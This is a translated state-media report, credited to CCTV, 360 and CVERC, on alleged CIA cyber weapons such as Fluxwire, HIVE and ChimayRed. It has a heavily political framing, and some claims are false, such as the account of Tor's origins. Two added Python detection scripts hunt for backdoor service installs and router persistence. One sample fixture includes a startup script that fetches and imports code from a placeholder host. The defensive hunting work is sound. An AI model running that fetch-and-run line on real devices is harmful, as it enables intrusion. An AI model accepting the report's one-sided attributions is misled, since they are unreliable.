The Central Intelligence Agency (CIA), a more widely known name than the National Security Agency (NSA), is one of the principal intelligence agencies of the US federal government. Headquartered in Langley, Virginia, it comprises four directorates: the Directorate of Intelligence (DI), the National Clandestine Service (NCS), the Directorate of Science and Technology (DS&T) and the Directorate of Support (DS). Its core business covers: collecting intelligence on foreign governments, companies and citizens; aggregating, analyzing and processing intelligence collected by other US intelligence agencies; providing national security intelligence and security risk assessments to senior US decision-makers; and organizing, executing, directing and supervising covert cross-border operations at the request of the President of the United States.

For decades the CIA has covertly carried out "peaceful evolution" and "color revolutions" around the world while continuously conducting espionage.

Since the start of the 21st century, the rapid development of the Internet has given the CIA new opportunities for infiltration, subversion and sabotage. Institutions and individuals around the world who use US Internet equipment and software products have become puppet "agents" of the CIA, helping the agency quickly become a dazzling "star" of cyber espionage.

Drawing on a large number of real cases investigated by 360 and the National Computer Virus Emergency Response Center (CVERC), this series of reports describes the main details of the CIA's cyber attack weapons, discloses the specifics of several typical cyber security incidents in China and other countries, comprehensively analyzes the CIA's cyber attacks and the related real-world harm, together with its contribution to the United States becoming the "Matrix" (hacker empire), and offers reference material and recommendations for victims of cyber attacks worldwide.

1. Overview

From the shocks to the international socialist camp in the 1980s and the upheavals in the Soviet Union and Eastern Europe in the early 1990s (the "Velvet Revolution"), to the "Rose Revolution" in Georgia in 2003, the "Orange Revolution" in Ukraine in 2004, the "Tulip Revolution" in Kyrgyzstan in 2005, the "Arab Spring" in West Asia and North Africa in 2011, the "second color revolution" in Ukraine in 2014 and the "Sunflower Revolution" in Taiwan, China, all of these have been recognized by international institutions and scholars as typical "color revolutions" led by US intelligence agencies. Attempted "color revolutions" have also taken place in other countries, such as the "Snowflake Revolution" in Belarus in March 2005, the "Orange Storm" in Azerbaijan in June 2005, the "Cedar Revolution" in Lebanon in 2005, the "Saffron Revolution" in Myanmar in 2007 and the "Green Revolution" in Iran in 2009. Counting from the Cold War period, incidents of regime change bearing the marks of "peaceful evolution" and "color revolutions" are too numerous to list. By one count, the CIA has over the decades overthrown or attempted to overthrow dozens of legitimate governments of other countries (the CIA itself has acknowledged only a handful of these), causing unrest in the countries concerned.

Analyzing the technologies involved in the above incidents, information communication and on-site command emerge as the decisive factors in their success or failure. The United States leads the world in these technologies; in particular, in the 1980s the United States promoted the Internet internationally and it was widely adopted by countries around the world, giving US intelligence agencies unprecedented technical means for launching "color revolutions" abroad.

Former US Secretary of State Madeleine Albright once threatened: "With the Internet, we have a way to deal with China."

Indeed, many "color revolution" incidents bear the shadow of Western powers using the Internet to push events along. During the "Arab Spring" in several countries of West Asia and North Africa, certain large US Internet multinationals intervened actively, pouring manpower, materiel and funding into the parties to the conflict, courting and supporting the opposition, openly challenging legitimate governments whose interests did not align with those of the United States, helping to spread disinformation and fuelling the continued escalation of popular protests.

The first is encrypted network communication services. To help protesters in parts of the Middle East stay connected while evading tracking and arrest, US companies (allegedly with US military backgrounds) developed TOR (The Onion Router), a technology for accessing the Internet without being traced. The servers involved encrypt all traffic passing through them, allowing selected users to browse anonymously. Once launched by US companies, the program was immediately offered free of charge to anti-government activists in Iran, Tunisia, Egypt and other countries, ensuring that "dissident youth who want to shake the rule of their own governments" could take part in activities shielded from the scrutiny and surveillance of their legitimate governments.

The second is communication services that keep working when the network is cut. To ensure that anti-government activists in Tunisia, Egypt and other countries could stay in touch with the outside world even when disconnected from the Internet, Google and Twitter quickly launched a special service called "Speak2Tweet", which let users dial in and leave voice messages free of charge; the messages were automatically converted into tweets and published on Twitter and other platforms, providing real-time reporting from the scene.

The third is Internet- and wireless-based on-site command tools for rallies and marches. The RAND Corporation spent years developing a non-traditional regime-change technique known as "swarming", which helps large numbers of young people connected over the Internet join hit-and-run mobile protests, greatly improving the efficiency of on-site command.

Fourth, a US company developed software called "Riot", which supports fully independent wireless broadband networks, provides reconfigurable Wi-Fi networks, does not rely on any conventional physical access method, requires no telephone, cable or satellite connection and can easily evade any form of government monitoring. With the help of these powerful network and communication technologies, the CIA has planned and organized a large number of "color revolution" events around the world.

Fifth, the US State Department has made the development of "anti-censorship" information systems a major task and has put more than $30 million into the project.

2. The CIA's family of cyberattack weapons

On March 7, 2017, the WikiLeaks website disclosed 8,716 secret documents purportedly from the CIA's Center for Cyber Intelligence, covering the attack methods of the CIA's hacking teams, the code names of attack projects, and the technical specifications and requirements for attack tools.

In 2020, 360 independently discovered a previously unexposed APT group specializing in cyber attacks and data theft against China and its friendly countries, with victims all over the world; we designated it APT-C-39. There is evidence that the group used cyber weapons linked to the leaked "Vault 7" material (including Athena, Fluxwire, Grasshopper, AfterMidnight, HIVE and ChimayRed) to attack targets in China and other countries, with activity going back years and related attacks continuing to this day. The targets include critical information infrastructure, aerospace, scientific research institutions, oil and petrochemical companies, large Internet companies and government agencies in various countries.

In its massive global cyber attack campaigns, the CIA has made extensive use of "0-day" vulnerabilities, including a large number of backdoors and vulnerabilities that have never been publicly disclosed (some of which have been verified), to build "botnets" and attack springboard networks around the world and to carry out staged intrusion operations against network servers, endpoints, switches, routers and a large number of industrial control devices. In cyber attacks discovered specifically against targets in China, we have successfully extracted multiple samples of Vault 7 cyber weapons; our partners in Southeast Asian and European countries have also extracted almost identical samples. They include:

2.1 Fluxwire backdoor platform

A complex backdoor and operation management platform that supports 9 mainstream operating systems, including Windows, Unix, Linux and macOS, and 6 different CPU architectures. It can organize many compromised "broiler" nodes into a fully autonomous mesh network with self-healing, cyclic attack and multi-path routing capabilities.

2.2 Athena program

A lightweight backdoor for Microsoft Windows, developed by the CIA together with Siege Technologies (acquired by Nehemiah Security in 2016). It can be implanted as a Windows service through remote installation, supply chain attacks, man-in-the-middle hijacking or physical access, and all attack function modules are decrypted in memory and loaded as plugins.

2.3 Grasshopper backdoor

An advanced, configurable backdoor for Microsoft Windows that can generate malicious payloads in multiple file formats (EXE, DLL, SYS, PIC), supports multiple execution methods and can be combined with different plugin modules to persist covertly and perform espionage functions.

2.4 AfterMidnight backdoors

A lightweight backdoor for Microsoft Windows that runs as a DLL service, dynamically retrieves and loads "Gremlins" modules over HTTPS and keeps its malicious payloads encrypted throughout execution.

2.5 ChimayRed exploit tool

An exploit toolkit targeting routers from brands such as MikroTik, which uses its exploits to implant lightweight implants such as "TinyShell" onto network devices.

2.6 HIVE (Hive) Cyber Attack Platform

The "Hive" cyber attack platform was jointly developed by a CIA department and a subsidiary of Northrop Grumman (NOC), a well-known US defense contractor, and provides the CIA's cyber attack teams with a complex and persistent attack capability. It manages a large number of compromised assets around the world, forming multiple layers of dynamic springboards and covert data transmission channels, and exfiltrates user accounts, passwords and private data to the CIA around the clock (see the CVERC report on HIVE, https://www.cverc.org.cn/head/zhaiyao/news20220419-hive.htm).

2.7 Other Derivatives

In the course of attacking and stealing secrets with the "Vault 7" cyber weapons above, the CIA has also derived and used a large number of attack samples not found in the "Vault 7" material, including phishing software installation packages disguised as legitimate software, keylogger components, system information collection components, USB file theft modules and various open-source hacking tools.

3. Functional analysis of samples of US Central Intelligence Agency (CIA) cyberattack weapons

While investigating a number of typical cyber attacks in China, 360 captured and successfully extracted from victims' networks a large number of Trojans, functional plugins and attack platform samples closely related to the CIA's "Vault 7" material. In-depth analysis found that most of these samples follow CIA malware development standards and technical specifications contained in "Vault 7", such as the Network Operations Division In-memory Code Execution Specification, the Network Operations Division Cryptographic Requirements and the Network Operations Division Persisted DLL Specification. These standards govern, respectively, the loading and execution, data encryption and persistence of malicious code in cyber espionage operations, and they show that the cyber weapons involved were subject to extremely strict, standardized and process-driven software engineering management. It is reported that only the CIA currently develops cyber attack weapons in strict compliance with these standards.

According to the "Vault 7" material, the cyber weapons above belong to the CIA's Engineering Development Group (EDG) and were developed independently or jointly by its Applied Engineering Division (AED) and Embedded Development Branch (EDB). Most of these cyber weapons were born on the CIA's top-secret internal network, devlan.net, a huge cyber weapons development and testing infrastructure built by the EDG. According to the devlan.net development logs, a sizeable team of EDG engineers was devoted to the HIVE project alone.

Further technical analysis found that most of the CIA's backdoors and attack components run memory-resident without files on disk, which makes discovering and forensically recovering samples extremely difficult. Even so, the joint technical team found an effective way to overcome this forensic challenge. For convenience of description and analysis, we provisionally divide the CIA's attack weapons into 9 categories:

3.1 Framework platforms. We discovered and captured Fluxwire, Grasshopper and Athena samples and campaigns; field testing showed that the functionality, attack characteristics and network behavior of these samples corroborate the descriptions in the Vault 7 material.

3.2 Attack module delivery. The CIA uses a large number of small, simple malicious downloaders to load and execute further malicious code and modules. The samples have no distinctive malicious functions or characteristics on their own, but combined with framework platforms and other attack weapons they exhibit powerful data theft capabilities, which makes attribution extremely difficult.

3.3 Remote control. A number of remote control plugins were extracted, most of which are attack module components derived from the framework platforms and work together with them.

3.4 Lateral movement. The large number of extracted samples includes several backdoors installed through Windows remote services using system administrator credentials. In addition, the CIA hijacked the intranet update mechanisms of several security products and distributed and installed backdoors through the intranet update server's upgrade function to move laterally within the internal network.
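The pattern described in 3.1 to 3.4 (a backdoor installed as a Windows service, often a DLL hosted by svchost.exe, created remotely with administrator credentials) leaves a service-installation record on the victim. The following hunting logic is an added example written for this page; it is not code from the report, from 360 or from any of the tools named above. The event records, host names, service names and paths are constructed for illustration and modelled on the fields of a System log "service installed" event (ID 7045); the trusted-directory list and the scoring thresholds are assumptions a defender would tune for their own estate.

```python
"""Hunt for suspicious Windows service installs in constructed event records."""
import ntpath
import re
from dataclasses import dataclass

# Constructed sample records (field names and values invented for illustration),
# modelled on System log event 7045, "A service was installed in the system".
SAMPLE_EVENTS = [
    {"event_id": 7045, "host": "ws01", "service": "WinDefendSvc",
     "image_path": r"C:\Windows\System32\svchost.exe -k netsvcs",
     "service_dll": r"C:\ProgramData\Cache\wdsvc.dll",
     "start_type": "auto start", "account": "LocalSystem", "logon_type": 3},
    {"event_id": 7045, "host": "ws02", "service": "AmdPcie",
     "image_path": r"C:\Windows\System32\drivers\amdpcie.sys",
     "service_dll": "", "start_type": "boot start", "account": "", "logon_type": 2},
    {"event_id": 7045, "host": "srv01", "service": "PSEXESVC",
     "image_path": r"C:\Windows\PSEXESVC.exe",
     "service_dll": "", "start_type": "demand start", "account": "LocalSystem",
     "logon_type": 3},
]

# Assumed baseline: directories where legitimately installed service binaries live.
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\program files")
# Service names created by common remote-execution tooling (PsExec installs PSEXESVC).
KNOWN_REMOTE_SERVICES = {"PSEXESVC"}


@dataclass(frozen=True)
class Finding:
    host: str
    service: str
    reasons: tuple


def _untrusted(path):
    """True when a non-empty path normalizes to somewhere outside TRUSTED_DIRS."""
    p = path.strip()
    if not p:
        return False
    p = ntpath.normpath(p).lower()        # collapses ..\ tricks before the prefix test
    return not p.startswith(TRUSTED_DIRS)


def _binary(image_path):
    """Strip service arguments (e.g. 'svchost.exe -k netsvcs') down to the binary."""
    m = re.match(r'"?([^"]+?\.(?:exe|sys))"?', image_path.strip(), re.I)
    return m.group(1) if m else image_path


def score_event(ev):
    """Return the list of reasons an event 7045 record looks like a backdoor install."""
    reasons = []
    if ev.get("event_id") != 7045:
        return reasons
    if _untrusted(ev.get("service_dll", "")):
        reasons.append("svchost-hosted ServiceDll outside trusted directories")
    if _untrusted(_binary(ev.get("image_path", ""))):
        reasons.append("service binary outside trusted directories")
    if ev.get("logon_type") == 3:
        reasons.append("service created from a network logon (remote install)")
    if ev.get("service", "").upper() in KNOWN_REMOTE_SERVICES:
        reasons.append("known remote-execution service name")
    return reasons


def hunt(events, min_reasons=2):
    """Keep records with at least min_reasons indicators, in input order."""
    findings = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            findings.append(Finding(ev["host"], ev["service"], tuple(reasons)))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f.host, f.service, "|", "; ".join(f.reasons))
```

On the constructed input the svchost-hosted DLL under ProgramData created from a network logon (ws01) and the PsExec service on srv01 are flagged, while the driver installed locally under System32 is not. A single indicator is deliberately not enough: a remote logon alone is routine for administrators, and only the combination with an out-of-place binary or a known remote-execution service name is worth an analyst's time.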

3.5 Information collection and theft. The joint technical team unexpectedly extracted an information theft tool used by the CIA that is one of the 48 advanced cyber weapons listed in the US National Security Agency's (NSA) classified ANT catalog, a dedicated NSA information theft tool. This indicates that the CIA and the NSA jointly attack the same victims, share cyber weapons with each other, or provide each other with technical or human support, and it adds important new evidence for attributing APT-C-39.

3.6 Exploitation. The investigation found that since at least 2015 the CIA has built up a huge springboard resource for cyber attacks around the world, using "zero-day" vulnerabilities to indiscriminately attack IoT (Internet of Things) devices and network servers worldwide and turning large numbers of compromised devices into springboard "broilers", either to hide its own attacks or to shift the blame for cyber attacks onto other countries. For example, the CIA uses an exploit kit codenamed "ChimayRed" against multiple models of MikroTik routers, including equipment that is widely deployed in China. During the attack, the CIA first maliciously modifies the router's startup script so that the backdoor still executes after a reboot; it then modifies the router's CGI program to close the vulnerability it exploited, preventing other attackers from breaking in and costing the CIA its foothold; finally, it implants proprietary backdoors such as "HIVE" or "TinyShell" that only the CIA can use.
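The persistence step above (a startup script that re-establishes the backdoor after every reboot) is the part of this chain an operator can check from a configuration export without forensic tooling. The following script is an added example for this page, not code from the report or from any tool it names. It assumes that "startup script" on RouterOS maps to a `/system scheduler` entry with `start-time=startup` whose `on-event` names a `/system script` (or is inline), and that the implant is staged with `/tool fetch` and `/import`; the export text below is constructed, and the host `198.51.100.7` is a documentation address, not a real indicator.

```python
"""Flag startup-persistence and exposed management services in a RouterOS export."""
import re

# Constructed sample export (not from a real device). Quoted values keep the
# backslash-escaped inner quotes exactly as /export prints them.
ROUTEROS_EXPORT = r'''
# constructed sample, not a real device export
/ip service
set www disabled=no port=80
set winbox disabled=no
/system script
add name=upd source=":delay 10s; /tool fetch url=\"http://198.51.100.7/u.rsc\" mode=http dst-path=u.rsc; /import u.rsc"
/system scheduler
add name=sch1 start-time=startup interval=0s on-event=upd policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive
add name=backup start-time=03:00:00 interval=1d on-event="/system backup save name=daily"
'''

# key=value pairs; a value is either a double-quoted string (with \" escapes) or a bare token.
KV_RE = re.compile(r'(\S+?)=("(?:[^"\\]|\\.)*"|\S+)')
URL_RE = re.compile(r'https?://([^/\s"]+)')
STAGING_RE = re.compile(r"/tool fetch|/import")
# Assumed list of services that should not be reachable from untrusted networks.
EXPOSED_SERVICES = ("www", "telnet", "ftp", "api")


def parse_export(text):
    """Return {section path: [entry dict, ...]} for 'add'/'set' lines of an export."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            current = line
            sections.setdefault(current, [])
            continue
        verb, _, rest = line.partition(" ")
        if verb not in ("add", "set") or current is None:
            continue
        entry = {"_verb": verb}
        if verb == "set":
            # 'set www disabled=no' names the item before its key=value pairs
            first, _, tail = rest.partition(" ")
            if "=" not in first:
                entry["name"] = first
                rest = tail
        for key, val in KV_RE.findall(rest):
            if val.startswith('"'):
                val = val[1:-1].replace('\\"', '"')   # unquote and unescape
            entry[key] = val
        sections[current].append(entry)
    return sections


def hunt_routeros(text):
    """Return (severity, kind, name, message) tuples for suspicious entries."""
    cfg = parse_export(text)
    scripts = {s.get("name"): s.get("source", "") for s in cfg.get("/system script", [])}
    findings = []
    for job in cfg.get("/system scheduler", []):
        body = job.get("on-event", "")
        body = scripts.get(body, body)          # on-event may name a script or be inline
        if job.get("start-time") != "startup":
            continue                            # only reboot-persistence is of interest here
        hosts = URL_RE.findall(body)
        sev = "high" if STAGING_RE.search(body) else "medium"
        findings.append((sev, "scheduler", job.get("name"),
                         "runs at startup; fetches from " + (", ".join(hosts) or "no remote host")))
    for svc in cfg.get("/ip service", []):
        if svc.get("name") in EXPOSED_SERVICES and svc.get("disabled") == "no":
            findings.append(("info", "service", svc["name"],
                             "management service enabled; restrict with address= or disable"))
    return findings


if __name__ == "__main__":
    for sev, kind, name, msg in hunt_routeros(ROUTEROS_EXPORT):
        print(f"[{sev}] {kind} {name}: {msg}")
```

On the constructed export the `sch1` job is reported as high severity because it runs at startup and its script fetches and imports a file from a remote host, the nightly backup job is ignored, and the enabled `www` service is listed for review. Because the attacker in the text also patches the exploited CGI program, a router can look "unexploitable" to a scanner while still carrying this persistence, so the configuration review is the more reliable check.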

3.7 Disguise as legitimate software. The CIA tailors backdoors to the target's network environment, packaging them as installation packages for niche software with a small user base that the target actually uses, and delivers them through precise social engineering attacks.

3.8 Security software attack and defense. The CIA has attack tools designed specifically to attack commercial antivirus software, which remotely shut down and kill designated antivirus processes so that the antivirus product cannot detect or block the CIA's attacks or attack weapons.

3.9 Third-party open-source tools. The CIA also frequently uses off-the-shelf open-source hacking tools in its campaigns. The initial stage of a CIA cyber attack typically targets the victim's network devices or servers, or uses social engineering. After gaining access to the target, it further explores the target organization's network topology and moves laterally to other networked devices in the intranet to steal more sensitive information and data. A target computer controlled by the CIA is monitored around the clock: all of the victim's keystrokes are recorded, clipboard contents are stolen, and the insertion of USB devices (mainly portable hard disks, USB flash drives and the like) is monitored in real time so that private files on the device are automatically stolen as soon as it is connected. Where possible, the camera, microphone and GPS positioning device on the user's terminal are also remotely controlled and accessed.

4. Summary

The cyber hegemony wielded by the United States originated in cyberspace and has spread across the world. As one of the three major intelligence collection agencies of the United States, the CIA has long conducted cyber attacks against the world with the hallmarks of automation, systematization and intelligence. The 8,716 documents leaked on WikiLeaks alone contain many important hacking tools and cyber weapons of the US intelligence services, showing that the United States has built the world's largest cyber arsenal. Through empirical analysis we found that its cyber weapons follow extremely strict espionage technical specifications, that its various attack methods echo and interlock with one another, and that they now cover almost all Internet and IoT assets in the world, able to control other countries' networks anytime and anywhere and steal their important and sensitive data. This undoubtedly requires enormous financial, technical and human resources; US-style cyber hegemony is plain to see, and the title "Matrix" (hacker empire) is well deserved.

This series of reports attempts to expose the CIA's various activities against cyber targets in China and makes a preliminary exploration of these cyber attacks and data espionage activities.

In the face of the highly systematic, intelligent and covert cyber attacks launched by the CIA against China, it is particularly important for domestic government agencies, research institutions, industrial enterprises and commercial organizations to "see" and "deal with" them promptly. To respond effectively to imminent cyber and real-world threats, while adopting independent and controllable domestic equipment, organizations should carry out self-inspection for APT attacks as soon as possible and gradually build a long-term defense system that achieves comprehensive, systematic prevention and control and resists advanced threats. (CCTV News Client)